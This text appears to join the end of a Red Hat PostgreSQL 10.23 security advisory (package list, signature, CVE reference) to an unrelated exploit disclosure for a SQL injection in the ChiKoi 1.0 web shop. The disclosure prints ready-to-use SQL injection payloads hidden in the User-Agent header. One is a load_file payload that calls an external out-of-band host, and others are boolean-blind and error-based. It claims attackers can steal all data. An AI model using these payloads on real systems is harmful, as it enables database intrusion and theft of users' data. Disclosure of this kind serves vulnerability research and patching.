postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm

x86_64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2625  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i99zjgjWX9erEAQiXbA//WFJNDVuYD112PQg6wO+FY9ee3L4eDa7x  
XIuCvIpVe6MxugA85cM0/h6NyvsUM7PyZC0aH/QU2uN2yDVgYr39xLNexocHvxAR  
EFiJOZhK+24uBxc9bfm+jVNqtbVOjkzhScUwjNtP5W4QZbBxzgPPTb0Ybzd9ixvk  
GV8DifcjfX1edlBCqV78Hx1P1ISSMipKeTs5HtHsAZ4uK53anrdqZASe2yVy/FVr  
D/s1DeKfWh/AF/6w5JNWB+MWgsQzOnoXH25agzJAE91+uewLk1XWIm3ky7efSYny  
2QwuNCseR5IL1rdaSCgIZY1+khyc1qMk9MxRUs54bJzWi8OMJXvsN08I8gsngrxV  
Nf27NQfMx9KjIkMo/+cV93rWHzhsjzM0uNb1CrJvBNtr5xWfIsD4vTiSJIP91hpY  
hBqo8+1pI6Wo66dQkrLDrSo7gdmcLegE56GEAZtwEMPyraXcvb5qToM4OVW8kiVE  
4Kw7CGodi864kesB6ZCKPY7vr68/OjOkWhvbqtbQ1D9kz1UvzRMAAF0meP5fA//s  
PLidab430BWeGd1UagqkQVVBSZ+TTD+oOJwIb+dJBTYpZnEkIuNe4h7eHFW1PTLn  
dCR2CI6UsDUzMPS6bjklqaGEFxCLZpn2c7xzyKhcvOwmhEJEm0UWIAZZNk5ip4b0  
C67oezmmLbg=  
=GaKj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0113-01

ChiKoi version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: ChiKoi-1.0 SQLi## Author: nu11secur1ty## Date: 01.12.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'was submitted in the User-Agent HTTP header.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can steal all information from this system and canseriously harm the users of this system,such as extracting bank accounts through which they pay each other, etc.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNIONSELECT 6994) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR---```[+] Online:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNIONSELECT 6426) END))-- ----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)## Proof and Exploit:[href](https://streamable.com/7x69yz)## Time spent`01:30:00`## Writing an exploit`00:05:00`

Tag

#sql